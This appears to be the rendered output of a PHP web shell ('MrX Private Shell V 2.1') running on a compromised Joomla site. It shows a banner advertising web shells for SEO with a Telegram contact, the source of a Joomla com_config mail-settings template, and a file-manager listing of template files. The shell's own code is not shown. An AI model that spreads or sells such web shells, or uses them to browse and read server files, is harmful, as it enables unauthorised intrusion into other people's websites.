__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package Joomla.Administrator
* @subpackage com_config
*
* @copyright (C) 2013 Open Source Matters, Inc. <https://www.joomla.org>
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
use Joomla\CMS\HTML\HTMLHelper;
use Joomla\CMS\Language\Text;
use Joomla\CMS\Layout\LayoutHelper;
use Joomla\CMS\Router\Route;
use Joomla\CMS\Session\Session;
defined('_JEXEC') or die;
HTMLHelper::_('form.csrf');
$this->document->getWebAssetManager()
->useScript('webcomponent.field-send-test-mail');
// Load JavaScript message titles
Text::script('ERROR');
Text::script('WARNING');
Text::script('NOTICE');
Text::script('MESSAGE');
// Add strings for JavaScript error translations.
Text::script('JLIB_JS_AJAX_ERROR_CONNECTION_ABORT');
Text::script('JLIB_JS_AJAX_ERROR_NO_CONTENT');
Text::script('JLIB_JS_AJAX_ERROR_OTHER');
Text::script('JLIB_JS_AJAX_ERROR_PARSE');
Text::script('JLIB_JS_AJAX_ERROR_TIMEOUT');
// Ajax request data.
$ajaxUri = Route::_('index.php?option=com_config&task=application.sendtestmail&format=json&' . Session::getFormToken() . '=1');
$this->name = Text::_('COM_CONFIG_MAIL_SETTINGS');
$this->fieldsname = 'mail';
$this->formclass = 'options-form';
?>
<joomla-field-send-test-mail uri="<?php echo $ajaxUri; ?>">
<?php echo LayoutHelper::render('joomla.content.options_default', $this); ?>
<button class="btn btn-primary" type="button" id="sendtestmail">
<span><?php echo Text::_('COM_CONFIG_SENDMAIL_ACTION_BUTTON'); ?></span>
</button>
</joomla-field-send-test-mail>
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| default.php | File | 3.96 KB | 0664 |
|
| default.xml | File | 204 B | 0664 |
|
| default_cache.php | File | 517 B | 0664 |
|
| default_cookie.php | File | 519 B | 0664 |
|
| default_database.php | File | 523 B | 0664 |
|
| default_debug.php | File | 517 B | 0664 |
|
| default_filters.php | File | 522 B | 0664 |
|
| default_locale.php | File | 521 B | 0664 |
|
| default_logging.php | File | 521 B | 0664 |
|
| default_logging_custom.php | File | 535 B | 0664 |
|
| default_mail.php | File | 1.53 KB | 0664 |
|
| default_metadata.php | File | 523 B | 0664 |
|
| default_navigation.php | File | 1 KB | 0664 |
|
| default_permissions.php | File | 607 B | 0664 |
|
| default_proxy.php | File | 517 B | 0664 |
|
| default_seo.php | File | 513 B | 0664 |
|
| default_server.php | File | 519 B | 0664 |
|
| default_session.php | File | 521 B | 0664 |
|
| default_site.php | File | 515 B | 0664 |
|
| default_webservices.php | File | 542 B | 0664 |
|